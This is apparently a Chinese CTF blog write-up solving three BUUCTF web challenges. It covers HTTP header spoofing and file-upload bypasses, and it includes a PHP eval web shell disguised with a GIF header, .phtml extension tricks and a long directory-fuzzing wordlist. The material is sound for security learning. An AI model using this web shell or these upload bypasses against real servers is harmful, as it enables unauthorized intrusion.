[极客大挑战 2019]Http、[极客大挑战 2019]Upload、[ACTF2020 新生赛]Upload

[ 极客大挑战 2019]Http

打开题目

没发现有用的信息,查看源代码

发现文件:Secret.php

直接去访问

根据提示修改Referer,直接抓包,添加字段

复制代码
Referer:https://www.Sycsecret.com
复制代码
Referer:https://Sycsecret.buuoj.cn

修改User-Agent

复制代码
User-Agent: Syclover/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0

修改X-Forwarded-For

复制代码
X-Forwarded-For:127.0.0.1

发现flag:flag{46c7c3e4-f60c-46fb-a985-4a10c8a5eb06}

[ 极客大挑战 2019]Upload

打开题目

是一个上传文件的网页,文件上传漏洞,上传一句话木马,并抓包

提示不是图片,我们修改数据

复制代码
Content-Type: image/jpeg

提示不能是php,对文件后缀名也进行了识别,那我们换了一种木马,那个木马类型是不是一段js代码,所以我们要想到什么文件能执行js代码,html,phtml,asp,jsp。那就改一下后缀名看看

因为html蚁剑连不上,尝试phtml文件

发现也可以

提示不能有**'<?'**,我们的文件开头加上"GIF89a?",来骗一波服务器

复制代码
GIF89a? <script language="php">eval($_REQUEST['rc'])</script>

上传成功,但是好像不知道路径,使用FUZZ测试

采用以下字典

复制代码
.viminfo

.bash_history

.bashrc

robots

README.md

crossdomain.xml

.git

.git/HEAD

.git/index

.git/config

.git/description

source

.source

README.MD

README

.gitignore

.svn

.svn/wc.db

.svn/entries

user

.hg

.DS_store

WEB-INF/web.xml

WEB-INF/src/

WEB-INF/classes

WEB-INF/lib

WEB-INF/database.propertie

CVS/Root

CVS/Entries

.bzr/

%3f

%3f~

.%3f

.%3f.swo

.%3f.swn

.%3f.swm

.%3f.swl

_viminfo

%3f~1~

%3f~2~

%3f~3~

%3f.save

%3f.save1

%3f.save2

%3f.save3

%3f_Edietplus

phpinfo

.htaccess

.svn/

.git/

.index

index

.index~

index_Edietplus

index.~

index.~1~

index~

login

register

test

upload

t

www

www.tar

web

web.tar

plus

qq

log

wwwroot

dede

admin

edit

Fckeditor

ewebeditor

bbs

Editor

manage

shopadmin

web_Fckeditor

webadmin

admin/WebEditor

admin/daili/webedit

login/

database/

tmp/

manager/

manage/

web/

admin/

shopadmin/

wp-includes/

edit/

editor/

user/

users/

home/

test/

administrator/

houtai/

backdoor/

flag/

upload/

uploads/

download/

downloads/

root

backup

.ds_store

flag

fl4g

f1ag

f14g

4dmin

adm1n

4dm1n

admin1

admin2

adminlogin

administrator

home

logs

config

member

users

info

backdoor

fm

example

mysql

a

b

c

d

db

bdb

ddb

dump

data

backup.gz

backup.bz2

rss.xml

1

2

3

123

111

222

/wp-config

/configuration

/sites/default/settings

/config

/conf/_basic_config

/config/site

/system/config/default

/framework/conf/config

/mysite/_config

/typo3conf/localconf

/config/config_global

/config/config_ucenter

/lib

/data/config

/includes/config

/data/common

/caches/configs/database

/caches/configs/system

/include/config

/phpsso_server/caches/configs/database

/phpsso_server/caches/configs/system

404

index.html

phpmyadmin/

phpMyAdmin/

.DS_Store

.idea/workspace.xml

project

common

db_mysql

install

conf

setup

init

php

http

core

ftp

database

Database

BookStore

DB

schema

update

sql

all

passwd

init_db

fckstyles

Config

build

ini

sample

settings

setting

Php

nginx

httpd

local

LICENSE

sitemap

username

pass

password

app

CHANGELOG

INSTALL

error

phpMyAdmin

pma

pmd

SiteServer

Admin/

manager

manage/html

resin-admin

resin-doc

axis2-admin

admin-console

system

wp-admin

uc_server

debug

Conf

webmail

service

memadmin

owa

harbor

master

xmlrpc

search

l

forum

p

cmd

shell

portal

blog

webapp

webapps

plugins

cgi-bin

htdocs

wsdl

html

tmp

file

solr

WEB-INF

zabbix

ckeditor

FCKeditor

editor

DataBackup

api

inc

default

2008

2020

2019

2018

2017

2020

2021

2022

备份

最新备份

新建文件

新建文件夹

新建文本

密码

新的

网站

bak

new

back

yuanma

源码

old

beifen

发现/upload目录,去访问

找到我们上传的文件了,去蚁剑访问

http://6d3e2b42-e362-479c-9de6-647312847844.node5.buuoj.cn/upload/muma.phtml

去根目录里找flag

发现flag:flag{76149781-a5f9-4174-8192-dcd365e8060f}

[ACTF2020 新生赛 ]Upload

打开题目

直接上传文件

发现前端有拦截,查看一下源代码

发现有onsubmit标签,删掉这个标签,再次上传

发现还是不行,把后缀改为.phtml

发现成功上传,使用蚁剑连接

访问根目录

发现flag:flag{d50e433a-aece-4bf5-8c8e-08c85d8d8880}

相关推荐
世界尽头与你10 小时前
(修复方案)基础目录枚举漏洞
安全·网络安全·渗透测试
枷锁—sha1 天前
【SRC】SQL注入快速判定与应对策略(一)
网络·数据库·sql·安全·网络安全·系统安全
liann1191 天前
3.1_网络——基础
网络·安全·web安全·http·网络安全
ESBK20251 天前
第四届移动互联网、云计算与信息安全国际会议(MICCIS 2026)二轮征稿启动,诚邀全球学者共赴学术盛宴
大数据·网络·物联网·网络安全·云计算·密码学·信息与通信
旺仔Sec1 天前
一文带你看懂免费开源 WAF 天花板!雷池 (SafeLine) 部署与实战全解析
web安全·网络安全·开源·waf
七牛云行业应用1 天前
Moltbook一夜崩盘:150万密钥泄露背后的架构“死穴”与重构实战
网络安全·postgresql·架构·高并发·七牛云
原来是你~呀~1 天前
Strix:AI驱动的全自动安全测试平台,LinuxOS部署
网络安全·自动化渗透测试·strix
fendouweiqian1 天前
AWS WAF(配合 CloudFront)基础防护配置:免费能做什么、要不要开日志、如何限制危险方法
网络安全·aws·cloudfront
乾元1 天前
终端安全(EDR):用深度学习识别未知勒索软件
运维·人工智能·网络协议·安全·网络安全·自动化·安全架构
Whoami!1 天前
⓫⁄₁₃ ⟦ OSCP ⬖ 研记 ⟧ Windows权限提升 ➱ 利用Windows计划任务提权
网络安全·信息安全·利用windows计划任务提权